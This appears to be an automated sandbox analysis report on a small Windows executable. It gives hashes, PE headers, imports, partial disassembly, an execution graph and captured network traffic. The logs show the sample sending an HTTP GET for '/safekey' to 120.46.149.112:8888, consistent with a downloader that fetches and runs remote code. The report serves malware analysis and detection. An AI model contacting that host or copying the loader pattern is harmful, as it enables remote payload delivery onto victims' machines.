SHA1:65D96C117E408B7EEC0874836FB1F0A2813FE3DD
SHA-256:365101531673C269837E002776B07844F6D349F8DF7A0297FB8AF6E0A7F8F8FF
SHA-512:CEFA3B9A6D887605A93AB287830524C838C4622F0B45F611C06FBF7645A9DB6EFBEA15C95702B818BA5F76F98C185B1C1B8FED668E591293D7410E7703206A15
Malicious:false
Reputation:low
Preview:MDMP..a..... .......Q..f.........................................U..........T.......8...........T............+..........................................................................................................eJ......T.......Lw......................T...........N..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):8782
Entropy (8bit):3.7083796324253178
Encrypted:false
SSDEEP:192:R6l7wVeJvkalUk6YEI6zz1gmfvZ8npr989bgu0fj/gm:R6lXJsg6YEFzhgmfvvgVfh
MD5:40093A2464877508D81C09952CA7A59B
SHA1:43C7D5E6D4C0AC2661CA4E31E2F199AFE54AF4CD
SHA-256:83D193FBCA739EEA2782B7ED0571BA247AD7B14A503E15AD62C0D26BBE963E5D
SHA-512:134C483E7915B610CD39EBA9C8404FEA8FE95623CB5708DDB92B371453972226CFA72AA25A0188E1D7559A943716932F601FA94BC488504DEF36842EFAD9EF06
Malicious:false
Reputation:low
Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.7.8.8.<./.P.i.
Process:C:\Windows\System32\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4677
Entropy (8bit):4.501859057780684
Encrypted:false
SSDEEP:48:cvIwWl8zsmJg771I9X7DkrWpW8VYYgYm8M4J5lF5Zyq85PHbp/r2d:uIjf8I7Ax7VfJ7ZObp/r2d
MD5:7C5B1178EE0E39D05FA4F146D206D940
SHA1:51F51D8AC2F3CA46CC2724AAD89E4A929251AC88
SHA-256:440D7E54CAD8D863403F6C3F04F5F71E0F5A4DEA0EC9EB331023E326ADA19BCB
SHA-512:00B357754D22CA719545E1BB7DF03D651C0B4A64CFC43F5DE7CCB6AE1CB79344BDAA7555C9F667F85F3953B91BAF9319644DC0FCA7F71441939E36A0AB2ECA90
Malicious:false
Reputation:low
Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="478186" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
Process:C:\Windows\System32\WerFault.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):1835008
Entropy (8bit):4.421635287114405
Encrypted:false
SSDEEP:6144:jSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNi0uhiTw:uvloTMW+EZMM6DFy403w
MD5:838210F92CE36DD918B3AEF93B2DA99E
SHA1:28D0BFB4FC21F8CF7497BC0963E95B92B34697CE
SHA-256:8B46C94685613B6A3FEF8DDB024D750DDE742B1D98760408D23D4F3D801A1D5D
SHA-512:7643868F671CC43768FBDF47C5261477B58A2CEAACDAF8BF3DB15EACF04C2579A8F522B74911CB0F283AA2C24B0CE603EEDC83A7B858B357B56C90080050026E
Malicious:false
Reputation:low
Preview:regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.i,s................................................................................................................................................................................................................................................................................................................................................iY:G........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
File type:PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):4.804615557784228
TrID:
  • Win64 Executable GUI (202006/5) 92.65%
  • Win64 Executable (generic) (12005/4) 5.51%
  • Generic Win/DOS Executable (2004/3) 0.92%
  • DOS Executable Generic (2002/1) 0.92%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:zXR333P8h1.exe
File size:11'776 bytes
MD5:36daa81e237927b3aa7c48a89193d2bb
SHA1:5186992f86f0911a97a395a82903ba4b89699c8c
SHA256:edde6b098aa5e685110c5b68f65523fc1e0a60a93268059b7a26c6e6265f91fb
SHA512:7eab61f7a0317eea1b305ddabdc44e36a0c8d1d495c84e0ebcf24a5093e377aaa5b7f6267ae5e2992a4e0229fbaab58fa8be4b9726f0efb138f8042567e7ef00
SSDEEP:192:kwAwmrQ0NrrOKXoBgJeRREHPcIHl3Q5tfXrqK:x9mrQwrrJXoBw2Re3
TLSH:8D324C06FA524CFBD62D4378C87B060FF075B215A36252CB2BA845362FA27D175352CE
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S......................~.......z.......{.......|.....e.~.......~.....n.w.....n.......n.}.....Rich....................PE..d..
Icon Hash:00928e8e8686b000
Entrypoint:0x1400014a0
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x140000000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:0x66D0A1B4 [Thu Aug 29 16:28:36 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:27e3cb01e0fdcf4969bc0112d4c19c13
Instruction
dec eax
sub esp, 28h
call 00007FD2E4B1943Ch
dec eax
add esp, 28h
jmp 00007FD2E4B18ED7h
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
xor ecx, ecx
call dword ptr [00000B93h]
dec eax
mov ecx, ebx
call dword ptr [00000B82h]
call dword ptr [00000B94h]
dec eax
mov ecx, eax
mov edx, C0000409h
dec eax
add esp, 20h
pop ebx
dec eax
jmp dword ptr [00000BB0h]
dec eax
mov dword ptr [esp+08h], ecx
dec eax
sub esp, 38h
mov ecx, 00000017h
call dword ptr [00000B94h]
test eax, eax
je 00007FD2E4B19069h
mov ecx, 00000002h
int 29h
dec eax
lea ecx, dword ptr [00002BD2h]
call 00007FD2E4B1910Eh
dec eax
mov eax, dword ptr [esp+38h]
dec eax
mov dword ptr [00002CB9h], eax
dec eax
lea eax, dword ptr [esp+38h]
dec eax
add eax, 08h
dec eax
mov dword ptr [00002C49h], eax
dec eax
mov eax, dword ptr [00002CA2h]
dec eax
mov dword ptr [00002B13h], eax
dec eax
mov eax, dword ptr [esp+40h]
dec eax
mov dword ptr [00002C17h], eax
mov dword ptr [00002AEDh], C0000409h
mov dword ptr [00002AE7h], 00000001h
mov dword ptr [00002AF1h], 00000001h
Programming Language:
  • [IMP] VS2008 SP1 build 30729
NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x29540xb4.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x1e0.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x50000x180.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x70000x30.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x24200x70.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x22e00x140.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x20000x1e0.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000xf8c0x100063244c169e774457baf7dc63df29417fFalse0.642822265625zlib compressed data5.9914608856947735IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata0x20000x10b20x1200bb87ee0086424e304593782f3e4454fdFalse0.3650173611111111data3.971791450669338IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0x40000x6380x2001c3b8ea3c34144e7a14bd945b131a256False0.091796875data0.44440530617738494IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata0x50000x1800x200a0c0ce72f212223279a3eeb52b9f1894False0.44921875data2.973332395911971IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc0x60000x1e00x200d223c232889289f7388583adeff234e1False0.525390625data4.697597008251789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0x70000x300x200af6cc35d5e5b67b995864e491990f117False0.125data0.6994753042429118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
NameRVASizeTypeLanguageCountryZLIB Complexity
RT_MANIFEST0x60600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
DLLImport
KERNEL32.dllHeapCreate, WaitForSingleObject, Sleep, CreateThread, HeapAlloc, RtlLookupFunctionEntry, GetModuleHandleW, IsDebuggerPresent, InitializeSListHead, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, RtlCaptureContext, GetCurrentProcess, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, IsProcessorFeaturePresent, TerminateProcess
WININET.dllInternetOpenUrlA, InternetOpenW, InternetReadFile
VCRUNTIME140.dll__C_specific_handler, __current_exception, __current_exception_context, memset, memcpy
api-ms-win-crt-heap-l1-1-0.dll_set_new_mode, malloc
api-ms-win-crt-runtime-l1-1-0.dllterminate, _initialize_onexit_table, _cexit, _crt_atexit, _register_thread_local_exe_atexit_callback, _exit, exit, _initterm_e, _initterm, _get_initial_narrow_environment, _initialize_narrow_environment, _configure_narrow_argv, _register_onexit_function, _set_app_type, _seh_filter_exe, _c_exit, __p___argv, __p___argc
api-ms-win-crt-math-l1-1-0.dll__setusermatherr
api-ms-win-crt-stdio-l1-1-0.dll_set_fmode, __p__commode
api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
Language of compilation systemCountry where language is spokenMap
EnglishUnited States
TimestampSource PortDest PortSource IPDest IP
Aug 30, 2024 12:43:27.021207094 CEST497258888192.168.2.5120.46.149.112
Aug 30, 2024 12:43:27.067817926 CEST888849725120.46.149.112192.168.2.5
Aug 30, 2024 12:43:27.067969084 CEST497258888192.168.2.5120.46.149.112
Aug 30, 2024 12:43:27.068236113 CEST497258888192.168.2.5120.46.149.112
Aug 30, 2024 12:43:27.121062994 CEST888849725120.46.149.112192.168.2.5
Aug 30, 2024 12:43:29.287858009 CEST888849725120.46.149.112192.168.2.5
Aug 30, 2024 12:43:29.287986994 CEST497258888192.168.2.5120.46.149.112
Aug 30, 2024 12:43:29.288134098 CEST497258888192.168.2.5120.46.149.112
Aug 30, 2024 12:43:29.301106930 CEST888849725120.46.149.112192.168.2.5
  • 120.46.149.112:8888
Session IDSource IPSource PortDestination IPDestination PortPIDProcess
0192.168.2.549725120.46.149.11288883788C:\Users\user\Desktop\zXR333P8h1.exe
TimestampBytes transferredDirectionData
Aug 30, 2024 12:43:27.068236113 CEST96OUTGET /safekey HTTP/1.1
User-Agent: myapp
Host: 120.46.149.112:8888
Cache-Control: no-cache


Click to jump to process

Click to jump to process

Click to dive into process behavior distribution

Click to jump to process

Target ID:0
Start time:06:43:26
Start date:30/08/2024
Path:C:\Users\user\Desktop\zXR333P8h1.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\Desktop\zXR333P8h1.exe"
Imagebase:0x7ff788880000
File size:11'776 bytes
MD5 hash:36DAA81E237927B3AA7C48A89193D2BB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:4
Start time:06:43:28
Start date:30/08/2024
Path:C:\Windows\System32\WerFault.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\WerFault.exe -u -p 3788 -s 1112
Imagebase:0x7ff726fb0000
File size:570'736 bytes
MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Reset < >

    Execution Graph

    Execution Coverage:27.2%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:24.6%
    Total number of Nodes:65
    Total number of Limit Nodes:3
    execution_graph 377 7ff788881308 381 7ff788881b50 SetUnhandledExceptionFilter 377->381 382 7ff788881f56 _seh_filter_exe 328 7ff788881324 329 7ff78888133d __scrt_initialize_crt 328->329 330 7ff78888147b 329->330 331 7ff788881345 __scrt_acquire_startup_lock 329->331 357 7ff7888819a8 IsProcessorFeaturePresent 330->357 333 7ff788881485 331->333 338 7ff788881363 __scrt_release_startup_lock 331->338 334 7ff7888819a8 9 API calls 333->334 335 7ff788881490 334->335 337 7ff788881498 _exit 335->337 336 7ff788881388 338->336 339 7ff78888140e _get_initial_narrow_environment __p___argv __p___argc 338->339 342 7ff788881406 _register_thread_local_exe_atexit_callback 338->342 348 7ff788881000 malloc 339->348 342->339 345 7ff78888143b 346 7ff788881445 345->346 347 7ff788881440 _cexit 345->347 346->336 347->346 350 7ff788881072 InternetOpenW InternetOpenUrlA InternetReadFile 348->350 351 7ff788881130 350->351 351->351 352 7ff788881170 6 API calls 351->352 363 7ff788881220 352->363 355 7ff788881afc GetModuleHandleW 356 7ff788881437 355->356 356->335 356->345 358 7ff7888819ce 357->358 359 7ff7888819dc memset RtlCaptureContext RtlLookupFunctionEntry 358->359 360 7ff788881a16 RtlVirtualUnwind 359->360 361 7ff788881a52 memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 359->361 360->361 362 7ff788881ad6 361->362 362->333 364 7ff788881229 363->364 365 7ff7888814e8 IsProcessorFeaturePresent 364->365 366 7ff7888811ec 364->366 367 7ff788881500 365->367 366->355 372 7ff7888815bc RtlCaptureContext 367->372 373 7ff7888815d6 RtlLookupFunctionEntry 372->373 374 7ff7888815ec RtlVirtualUnwind 373->374 375 7ff788881513 373->375 374->373 374->375 376 7ff7888814b4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 375->376 383 7ff788881452 384 7ff788881afc GetModuleHandleW 383->384 385 7ff788881459 384->385 386 7ff78888145d 385->386 387 7ff788881498 _exit 385->387 388 7ff7888814a0 391 7ff788881880 388->391 392 7ff7888814a9 391->392 393 7ff7888818a3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 391->393 393->392 394 7ff788881240 395 7ff788881250 394->395 407 7ff7888816b8 395->407 397 7ff7888819a8 9 API calls 398 7ff7888812f5 397->398 399 7ff788881274 _RTC_Initialize 404 7ff7888812d7 399->404 415 7ff788881940 InitializeSListHead 399->415 404->397 406 7ff7888812e5 404->406 408 7ff7888816c9 407->408 413 7ff7888816fb 407->413 409 7ff7888816ce __scrt_release_startup_lock 408->409 410 7ff788881738 408->410 409->413 414 7ff7888816eb _initialize_onexit_table 409->414 411 7ff7888819a8 9 API calls 410->411 412 7ff788881742 411->412 413->399 414->413

    Callgraph

    • Executed
    • Not Executed
    • Opacity -> Relevance
    • Disassembly available
    callgraph 0 Function_00007FF78888182C 1 Function_00007FF78888192C 2 Function_00007FF78888166C 8 Function_00007FF788881C34 2->8 30 Function_00007FF788881950 2->30 3 Function_00007FF7888819A8 17 Function_00007FF7888819A0 3->17 4 Function_00007FF788881968 15 Function_00007FF788881958 4->15 21 Function_00007FF788881960 4->21 5 Function_00007FF788881868 5->0 6 Function_0000021B708B0008 7 Function_00007FF788881EB4 9 Function_00007FF7888814B4 10 Function_00007FF788881F74 11 Function_00007FF788881930 12 Function_00007FF788881630 20 Function_00007FF788881DE0 12->20 13 Function_00007FF7888817DC 13->20 14 Function_00007FF788881998 16 Function_00007FF788881324 16->2 16->3 16->12 16->13 16->14 31 Function_00007FF788881990 16->31 34 Function_00007FF788881AFC 16->34 38 Function_00007FF788881744 16->38 40 Function_00007FF788881000 16->40 44 Function_00007FF788881800 16->44 18 Function_00007FF788881220 18->9 32 Function_00007FF7888815BC 18->32 19 Function_00007FF7888814A0 43 Function_00007FF788881880 19->43 22 Function_00007FF788881B60 23 Function_00007FF788881308 23->1 29 Function_00007FF788881B50 23->29 24 Function_00007FF788881F56 25 Function_00007FF7888817D5 26 Function_00007FF788881954 27 Function_00007FF788881E94 27->7 28 Function_00007FF788881452 28->34 33 Function_00007FF788881BBC 35 Function_00007FF7888816B8 35->3 35->20 36 Function_00007FF788881938 37 Function_00007FF788881BF8 39 Function_00007FF788881984 40->18 41 Function_00007FF788881940 42 Function_00007FF788881240 42->1 42->3 42->4 42->5 42->11 42->26 42->30 42->33 42->35 42->36 42->39 42->41 44->30

    Control-flow Graph

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2315117754.00007FF788881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF788880000, based on PE: true
    • Associated: 00000000.00000002.2315105196.00007FF788880000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2315128810.00007FF788882000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2315140096.00007FF788885000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff788880000_zXR333P8h1.jbxd
    Similarity
    • API ID: Internet$CreateHeapOpen$AllocateFileObjectReadSingleSleepThreadWaitmallocmemcpy
    • String ID: myapp$qvan
    • API String ID: 1141583048-30057361
    • Opcode ID: ff18313de4e38429549773d7a3bfc6d61f30ae89c3906916010a4d2c0ce61380
    • Instruction ID: f2f7da8ef663dd6f99e2303a115977ee8bd46e48549814c5b71b69af8ed039ad
    • Opcode Fuzzy Hash: ff18313de4e38429549773d7a3bfc6d61f30ae89c3906916010a4d2c0ce61380
    • Instruction Fuzzy Hash: 3351F526A2C68181E7509F24F81073AFBA0FB89BD1FA05235DA9E47B55DF3CD194CB14

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2315117754.00007FF788881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF788880000, based on PE: true
    • Associated: 00000000.00000002.2315105196.00007FF788880000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2315128810.00007FF788882000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2315140096.00007FF788885000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff788880000_zXR333P8h1.jbxd
    Similarity
    • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
    • String ID:
    • API String ID: 120244420-0
    • Opcode ID: 06ba3462c6f8394d9f5c6c33734da97f387d30d51ce51b5fa0b65d9b25833efd
    • Instruction ID: 98575c83ae321c09726bf6cba7fd0db6f45a9e636e598c0219d66ae9e60bfd0c
    • Opcode Fuzzy Hash: 06ba3462c6f8394d9f5c6c33734da97f387d30d51ce51b5fa0b65d9b25833efd
    • Instruction Fuzzy Hash: 70311C29A7860382FA50BB61A4513B9E391BF45784FE44035E64E976D7DF2CF824C339

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2315117754.00007FF788881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF788880000, based on PE: true
    • Associated: 00000000.00000002.2315105196.00007FF788880000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2315128810.00007FF788882000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2315140096.00007FF788885000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff788880000_zXR333P8h1.jbxd
    Similarity
    • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
    • String ID:
    • API String ID: 313767242-0
    • Opcode ID: 3a5cc5061434ed619a7068fe8aaa8b394ec29e7e35a83428ce09ea6eddd65f3b
    • Instruction ID: 2b3498c6d08a91c5f40b9156a7db3cad69fb88e4ca338043bb512b70a268a600
    • Opcode Fuzzy Hash: 3a5cc5061434ed619a7068fe8aaa8b394ec29e7e35a83428ce09ea6eddd65f3b
    • Instruction Fuzzy Hash: 3331A676629B8186EB609F60E8403EDF3A0FB84744F94443ADA4E47B94DF3CD558C724
    Memory Dump Source
    • Source File: 00000000.00000002.2315117754.00007FF788881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF788880000, based on PE: true
    • Associated: 00000000.00000002.2315105196.00007FF788880000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2315128810.00007FF788882000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2315140096.00007FF788885000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff788880000_zXR333P8h1.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: aa898b69dfbf1d93f180c3c910f4faefa0655920bd0466b0c3ff927ea8509a8f
    • Instruction ID: bb6a3d30e8591f2622e6b157dc9086352021db35d9a44c880274c454b5d87e49
    • Opcode Fuzzy Hash: aa898b69dfbf1d93f180c3c910f4faefa0655920bd0466b0c3ff927ea8509a8f
    • Instruction Fuzzy Hash: 43A0022993CC46D4E644AB05E960030E334FB60341FE00031D41D910A0EF3CB4B5D32C